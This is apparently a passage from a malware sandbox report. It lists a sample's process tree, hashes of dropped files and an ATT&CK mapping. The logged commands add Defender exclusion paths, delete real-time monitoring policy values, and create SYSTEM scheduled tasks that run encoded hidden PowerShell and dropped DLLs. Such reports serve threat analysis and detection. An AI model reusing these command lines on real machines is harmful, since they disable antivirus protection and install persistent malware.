      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2868
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:1436
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2068
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:1496
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:380
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:616
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:976
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:284
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:812
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:956
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2256
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:2024
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:920
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:2200
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:704
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:2540
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1952
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gCgzsyGQr" /SC once /ST 02:07:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2428
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gCgzsyGQr"
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gCgzsyGQr"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2408
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2844
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:2352
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2816
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:2924
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "FTlmQXMDCFpnewAuq" /SC once /ST 07:40:15 /RU "SYSTEM" /TR "\"C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe\" VS /site_id 525403 /S" /V1 /F
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2628
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "FTlmQXMDCFpnewAuq"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3036
- C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe
  C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe VS /site_id 525403 /S
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops Chrome extension
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2660
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bJbhxhmwQPPePEjnjA"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1720
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2464
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
      4⤵
      PID:2932
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2776
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:2380
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oWxSecJNU\wTvaWw.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zeLHdclAQOoTZxj" /V1 /F
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2904
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "zeLHdclAQOoTZxj2" /F /xml "C:\Program Files (x86)\oWxSecJNU\PkhsMVd.xml" /RU "SYSTEM"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1484
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "zeLHdclAQOoTZxj"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:892
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "zeLHdclAQOoTZxj"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2496
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "KJMKKiIztyaoEB" /F /xml "C:\Program Files (x86)\YNUWFfCEdUiU2\gQNcOWE.xml" /RU "SYSTEM"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2508
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "xicirzYkCmkIU2" /F /xml "C:\ProgramData\eiYaNjTCbhfbMeVB\GjMlpvz.xml" /RU "SYSTEM"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2488
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "LUmQQZwnOYWgZobiD2" /F /xml "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\uuRcAjq.xml" /RU "SYSTEM"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2700
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "IkWUsEdSKunoejOLGpU2" /F /xml "C:\Program Files (x86)\LsajhStaXkJRC\NDjBuRm.xml" /RU "SYSTEM"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2604
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "dBpreMcpfXbehynYz" /SC once /ST 07:25:32 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\biwNYXhGTKCQxjLv\fJSjsJgR\ZOHjBiK.dll\",#1 /site_id 525403" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Scheduled Task/Job: Scheduled Task
    PID:1380
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "dBpreMcpfXbehynYz"
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1432
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:1560
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:808
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "FTlmQXMDCFpnewAuq"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2928
- C:\Windows\system32\rundll32.EXE
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\fJSjsJgR\ZOHjBiK.dll",#1 /site_id 525403
  2⤵
  PID:2624
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\fJSjsJgR\ZOHjBiK.dll",#1 /site_id 525403
    3⤵
    - Blocklisted process makes network request
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    PID:2716
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "dBpreMcpfXbehynYz"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1608

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:924

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2704

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2332

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indirect Command Execution

T1202

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\LsajhStaXkJRC\NDjBuRm.xml

Filesize
2KB

MD5
8638dc81e0c3727dd2720c2cc271a752

SHA1
92e23d91e92e788a3da8825fc16eabfff23c392e

SHA256
45b14acd84eacfe2de914415f3d56c9fc9ec4f2ed10d9feef6f95f710abace11

SHA512
4a0089bd204154e6f34158c035ce62262ae1f67bd2acbb4deec0a58caf26517b11adb417c3a1d61e6cca92df7add5fd92f78edb41d6297b5ded7ccf7ede77aa9

Download Submit
C:\Program Files (x86)\YNUWFfCEdUiU2\gQNcOWE.xml

Filesize
2KB

MD5
d836f34ef7cb4476b468f6cc1866f6da

SHA1
aac717790f6b225016827d1925730bdcbcaabfe8

SHA256
3c56a3579841566739553771d65d10252304a19d4b8adba9c8f8d8253bb55617

SHA512
bb46fd681f2c328e27b599c5ca0fe8083da50f5b5e66a550fc5d26e38aeb01ade31336ff2ea7183c1ce773b63a129b816855a86edff7604d1765c83ff752da63

Download Submit
C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\uuRcAjq.xml

Filesize
2KB

MD5
c6a459d7dd91a1268250e1f62a508797

SHA1
35506e92f73284d9b6018029164c3f3a090db8a4

SHA256
141ece9dc8c85a5c460448e464dd67568473cad9b50e1b2e76f1ef6f1061034e

SHA512
32fd76014615dfbf009389f08629862fcaf470c3743d89750a4da95a9265003179a202c18de855bd6836e509256986258ff2d541fe94d2661339899a9a66d418

Download Submit
C:\Program Files (x86)\oWxSecJNU\PkhsMVd.xml

Filesize
2KB

MD5
ea2d32637d65894f9eaec679291f1e83

SHA1
282f56ed34a6330f819091627dae370c3be0be56

SHA256
61ef38d52c7a2cdbeab46677a611e7924ccdc020f5816766d0af06554bc19168

SHA512
177372efb423158b26e4c0dc7416e05be10a77014136cb524679dccb7dff282536b90af97939d74ce772914b047a89224f403de002ed9a01375f73e03eda872e

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

Filesize
1.1MB

MD5
6668505758ae5e6b20882f77d4e100ea

SHA1
b0f20e9ee3604cbb3285643812921f0cb75503c9

SHA256
d50cc2b8cc8bcf26f5e3f0ab866c7f855c9fce08a5e06e14e58d791babf2f889

SHA512
56a388f771c8b6b0c9c1399076c8a201023d679b234b0a48d030d002cacbeee4316f99d827a6e068532ea8794785e83527a48a06ec4fbb3e1af0b182c294d080

Download Submit
C:\ProgramData\eiYaNjTCbhfbMeVB\GjMlpvz.xml

Filesize
2KB

MD5
2bbfca38a3b96d5464a9f23d4473c53b

SHA1
5f444537726dbb418d0acf31ec0eb096332ff841

SHA256
54ab6131fbad3efa3de7ba2d18c6918c73563c30df771f48d4477c84d56ce1ed

SHA512
cd885f2a9456b99e9781f8128ef71f986aa0f193e1f9efa4972bd2e7f495a0410784bfca67fa0ad9fa8129c29af1ad65ca6a5160d1bdd329b8f3b4a81af7bc3e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
e83cd1a56c56efa07587dec0d18951ff

SHA1
f800e938f16b6d5e94703db57f856ef87a7ab97e

SHA256
64cc007965e9dcb43466ce96a4d4fdb42ad34df7cdf8a4e5c5326a841ae8988d

SHA512
156f92eaf83b22e12909aa9973f2bb8d09bcadde9138c1a0c42b0f74a627c2f0031d2ce0e45fc77b38672d6fae91acca517ad8d5392f976c55e3f949c9fa9fdc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
23KB

MD5
020cc5815b6254caf3a8f4ae4af8e145

SHA1
adbfbdcad7a8e28a50abc701b5ff2efeeaa2088c

SHA256
3d2b07524706f7b25d5f24f776c5a12e2b2e1ceac8551c418ad4c07e1e905951

SHA512
9dacfb62f40b03baaecd32098a152d523bea7f0178bd683fc2fd34715c58e081bd09cef0bae058e784976b6e269958481a94edc6f5f2fced0143bd17f1e36b6b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
512689431c526b3877d145daae6b3b37

SHA1
35366f6952ce97d1331ebe3a5223e77ba647e7e8

SHA256
50f883f11e3afe182b8c826932c8df0e8e485c9049750653122f363a90a6b6e5

SHA512
9ea20db6720a4152d439baba1d6efc2f91841bd9d0a885a8c464042a9e49555e10503f5464a189dbd6c0e4979fc9299ba53141fb6bae370308306495e0e24259

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
22442755e316777ad64c18b0294848a3

SHA1
d4883d517b39f2a13288bd2d909d27e8f7455e9f

SHA256
b06854cfcc1a6bbffec5ba399f076749c5206e242f5273154160a36646f9181f

SHA512
bd3c37fc4d638cf5882b7f39388508954c11f9ac092221d8c4a94b777caf9dabdda601eecc7806043188a8d9128a03eed6d287770949e300dc415a5d74dbea8d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
295ef5757d8c391efbb816a37e7484e2

SHA1
f9f00d91a602020467c8c39efa4462e0357db1d5

SHA256
6edc726e47447841973c3f32ca325ac07e116ac1d307bd3f25414c7fce6238bb

SHA512
52b83db85289d3e32aa31ef8c203605d96cc8c7d508ce24131d53e0fa6417d1f353768bcf458b10abfc407ecf16761965ac8e28e600b00d9aa89b264e5237eea

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs.js

Filesize
7KB

MD5
bad9851ac92d4385610db42a04db5ec8

SHA1
996e21351f05fcf79fd31254b20448005f7c924d

SHA256
e07224a77fec5d70d7d7e7985c0f67e67fe27488013df79387e25beb7a370cd8

SHA512
1beca2278bedbc8025a64fae8cbff6be2444c4001c1afcc7ad57cc9e0ce4794c92dae8b1e1a0b6dfc953d8f14a5dcf10eb509c1e1bce5394d05af2c4981f7c75

Download Submit
C:\Windows\Temp\biwNYXhGTKCQxjLv\cmhOiYys\dWuMemSkgQhOHvSI.wsf

Filesize
8KB

MD5
94e3f041d8ea046678247aa60dad93f0

SHA1
05c41707e24956bea84e866e47668c87272ded9b

SHA256
07eff7333d08763e82ccdc124afaa8cb36906b6a2ff34b5479f80e5722c0d1e9

SHA512
d3234f481cb56722bceab83a515405aa758936cda44ec30d3b9a408e3dcd3e21f8765ef7a4442913e2f5ffb37869f1a1f859d66d0d9c1b819d891475e610059a

Download Submit
C:\Windows\Temp\biwNYXhGTKCQxjLv\fJSjsJgR\ZOHjBiK.dll

Filesize
6.2MB

MD5
617698f01c7cceb3b262a98ba4da5a98

SHA1
c9244abc65ab3c485cc197ddea5e846b65d14bad

SHA256
9c0b90664119447fee609a6a27f5d97affa2ae310bd9d1aa37e458c9819f1754

SHA512
3b713c0ff53a7f88f628a90b30d59417bf5b92216666e4bd2f4c1cd502f338a1838c9691d5ee2830015b5f697ca811ee8e976d026c0d073b1487fb573b50a400

Download Submit
C:\Windows\system32\GroupPolicy\Machine\Registry.pol

Filesize
5KB

MD5
103efdadea8dc9131b76649cbba6bedf

SHA1
30d71efcf6b0935bde43f50f336d886a8a6b8585

SHA256
f7940488e3457006f40052a873db5f5d403d81b10d566a58a84eb95a5eb419ff

SHA512
f914fb73d4e2a469e54f9832b986738d12737d86687de41aae65add5fb3327a49d72653120c1d1f954d04981263259badf420cb017205c4f417bd4d07528675c

Download Submit
C:\Windows\system32\GroupPolicy\gpt.ini

Filesize
268B

MD5
a62ce44a33f1c05fc2d340ea0ca118a4

SHA1
1f03eb4716015528f3de7f7674532c1345b2717d

SHA256
9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

SHA512
9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\7zSC487.tmp\Install.exe

Filesize
6.3MB

MD5
3b76af9e2510171d3739b8bc9ee2ee68

SHA1
4c8148a587ba7e6de8963c2d4dbbcceac39b3694

SHA256
3c888be794010977e28034fd484ed7363ff6c52dfe6c8449acbe6cce4e637768

SHA512
d9736ae8439c7d809cdd299423f8ac04f6301c4eb3c1997fa217b4e8cd77174f795d1632b23f6e8a93eb6c96b998a8258f2366b3d701a7a2b944cab83a3a8d94

Download Submit
\Users\Admin\AppData\Local\Temp\7zSC62C.tmp\Install.exe

Filesize
6.8MB

MD5
ad10a30760d467dade24f430b558b465

SHA1
7aaa56e80264c27d080c3b77055294593eacca1b

SHA256
44c717fd08281b16f266bd9bc037fc16713a8ac02e1dfe519ba3be49bac8442a

SHA512
23c13f8c865da24d848b2843b67190188048e7383dcb2dff10f8e8e94862a8ae1916aef3566cd2ce4346c816f7e8301912a9fff4a04bb5380b75b98bd7154e63

Download Submit
memory/884-60-0x000000001B770000-0x000000001BA52000-memory.dmp

Filesize
2.9MB

Download
memory/884-61-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/1944-50-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/1944-49-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/2088-23-0x0000000010000000-0x0000000010F04000-memory.dmp

Filesize
15.0MB

Download
memory/2608-31-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2608-30-0x000000001B650000-0x000000001B932000-memory.dmp

Filesize
2.9MB

Download
memory/2660-122-0x00000000012A0000-0x000000000130B000-memory.dmp

Filesize
428KB

Download
memory/2660-291-0x0000000003970000-0x00000000039E3000-memory.dmp

Filesize
460KB

Download
memory/2660-301-0x0000000004B70000-0x0000000004C2D000-memory.dmp

Filesize
756KB

Download
memory/2660-87-0x0000000003430000-0x00000000034B5000-memory.dmp

Filesize
532KB

Download
memory/2716-327-0x0000000001470000-0x0000000002374000-memory.dmp

Filesize
15.0MB

Download